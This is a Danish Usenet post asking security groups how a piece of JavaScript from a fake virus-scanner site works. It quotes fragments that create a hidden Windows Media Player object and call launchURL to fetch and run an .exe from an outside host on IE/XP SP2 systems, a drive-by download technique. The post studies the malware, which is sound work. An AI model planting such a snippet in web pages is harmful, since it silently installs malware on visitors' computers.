---

XPOST:
dk.edb.internet.webdesign.clientside,dk.edb.sikkerhed,dk.edb.sikkerhed.virus
FUT: dk.edb.sikkerhed

Hej grupper.

I forbuindelse med at jeg er ved at fabrikere et playback af en fake
virusscanner
<http://w-o-p-r.dk/xoomer/scanner.playback/xoomer.scanner.asp>
Er jeg stødt på følgende javascript:
fra
<http://w-o-p-r.dk/xoomer/scanner.playback/malware.javascript.part.1.html>

<udsnit>
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6" // <-- FYI GUID til
Mediaplayer.
document.write("<object id=iie width=0 height=0 classid='CLSID:"+u.. osv
</udsnit>
Her skabes en instans af mediaplayer med 0x0 px
Lidt længere nede:
<udsnit>
if (is_IE) {
if (is_XP_SP2) {
try {
iie.launchURL("http://xscanner.maXXXlarms.com/a/Install3400.exe"); }
</udsnit>

Tilsyneladende laver man en launchURL til Mediaplayeren med en _.exe_ fil.

Jeg har ikke selv XP, og jeg har forsøgt at søge mig ihjel på Google efter
"launchURL".

Men det eneste jeg får er hjemmefabrikerede Javascript funktioner.

Mine spørgsmål er så:
1) Er .launchURL en metode på mediaplayer objektet, eller er det en
'programmeringsfejl'?
2) Vil mediaplayer _afvikle_ en _.exe_ fil?
3) Hvis ja, er det en fejl eller en M$ 'feature' i mediaplayer?

--
Med venlig hilsen
Stig Johansen